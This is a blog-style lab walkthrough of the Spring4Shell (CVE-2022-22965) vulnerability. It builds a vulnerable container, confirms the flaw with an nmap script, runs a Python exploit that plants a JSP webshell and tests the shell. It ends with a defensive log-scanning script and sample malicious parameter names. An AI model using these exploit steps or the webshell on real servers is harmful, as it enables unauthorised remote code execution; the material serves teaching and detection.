As described by the MITRE CVE Database – A Spring MVC or Spring WebFlux application running on Java 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it. Spring4Shell has affected a wide variety of vendors' products, including Cisco, VMware, Fortinet, etc.

OK, so let's get to labbing this one!
Disclaimer – never test on a production network. Always have permission. The following method is for a LAB environment only.

You will need a Linux VM capable of running Docker. I'm using Ubuntu 20.x. Host IP for this example is
A secondary host to run the nmap scan (can be any OS as long as it supports nmap and the scripting engine). IP for my nmap host is

1. Install Docker on your Ubuntu VM and run the Spring4Shell container pre-made by reznok on GitHub:
sudo apt install
sudo docker build . -t spring4shell && sudo docker run -p 8080:8080 spring4shell

App will now be available at

2. Clone the Spring4Shell NSE from gpiechnik2 on GitHub.
Save it to your scanning host. In this example I used Windows. Run it against the target to confirm the vulnerability:
Spring4Shell>nmap -v -sS --script=spring4shell.nse
Starting Nmap 7.92 ( ) at 2022-04-13 23:08 W. Australia Standard Time
Initiating NSE at 23:08
Completed NSE at 23:08, 0.00s elapsed
Scanning [1 port] Initiating SYN Stealth Scan at 23:08
Scanning [1000 ports] Discovered open port 8080/tcp on
Discovered open port 22/tcp on
Completed SYN Stealth Scan at 23:08, 0.07s elapsed (1000 total ports)
NSE: Script scanning
Initiating NSE at 23:08
Completed NSE at 23:08, 4.13s elapsed
Nmap scan report for
Host is up (0.00036s latency).
Not shown: 998 closed tcp ports (reset)
22/tcp open ssh
8080/tcp open http-proxy
| spring4shell:
| Spring4Shell - Spring Framework RCE via Data Binding on JDK 9+
| IDs: CVE:CVE-2022-22965
| Check results:
| Extra information:
| References:
MAC Address: 00:0C:29:5C:08:93 (VMware)

OK, confirmed: the host is vulnerable. Let's move on to the exploit.

3. Save the to your scanning host and execute with Python (you may need to install python3 and use pip to install the requests module):
C:\Spring4Shell>python .\ --url --file shell
[*] Resetting Log Variables.
[*] Response code: 200
[*] Modifying Log Configurations
[*] Response code: 200
[*] Response Code: 200
[*] Resetting Log Variables.
[*] Response code: 200
[+] Exploit completed
[+] Check your target for a shell
[+] File: shell.jsp
[+] Shell should be at:

4. Test the webshell in a browser. Use URL encoding for spaces (%20) etc:

Check the notes on the Spring Framework website here.
Spring4Shell was patched quickly due to the RCE nature of the vulnerability. Vendors that use the Spring Framework have released their own patches.
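
On the defensive side, the data-binding requests from this lab can be flagged in proxy or WAF logs that record parameter names. The following is an added example, not code from the original post or from the Spring project: it checks parameter names against the deny-list patterns in Spring's published `setDisallowedFields` workaround (`class.*`, `Class.*`, `*.class.*`, `*.Class.*`), which this page does not reproduce. The function names and sample records are hypothetical and constructed for illustration.

```python
"""Flag request parameter names that match the deny-list from Spring's
data-binding workaround for CVE-2022-22965 (added example, hypothetical names)."""
from fnmatch import fnmatchcase
from urllib.parse import parse_qsl, unquote_plus

# Spring's workaround lists class.*, Class.*, *.class.*, *.Class.*;
# matching the lowercased name against two patterns covers all four.
DENY_PATTERNS = ("class.*", "*.class.*")


def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded names are still matched."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_params(encoded):
    """Return decoded parameter names in a query string or form body that match."""
    hits = []
    for name, _ in parse_qsl(encoded, keep_blank_values=True):
        name = fully_decode(name)
        lowered = name.lower()
        if any(fnmatchcase(lowered, p) for p in DENY_PATTERNS) and name not in hits:
            hits.append(name)
    return hits


def scan(records):
    """records: iterable of (source, encoded_params). Returns {source: hits}."""
    findings = {}
    for source, encoded in records:
        hits = suspicious_params(encoded)
        if hits:
            findings[source] = hits
    return findings


# Constructed sample records: (client address, raw query string or form body).
SAMPLE = [
    ("192.0.2.10", "name=alice&age=30"),
    ("192.0.2.66", "class.module.classLoader.X=1&name=bob"),
    ("192.0.2.67", "user.class.module.X=1"),
    ("192.0.2.68", "class%252Emodule%252EclassLoader%252EX=1"),
    ("192.0.2.11", "classroom=12b&subclass=none"),
]

if __name__ == "__main__":
    for src, names in scan(SAMPLE).items():
        print(src, names)
```

Ordinary field names such as `classroom` or `subclass` are not flagged, because the patterns require `class` to be a complete dotted path segment followed by a further property.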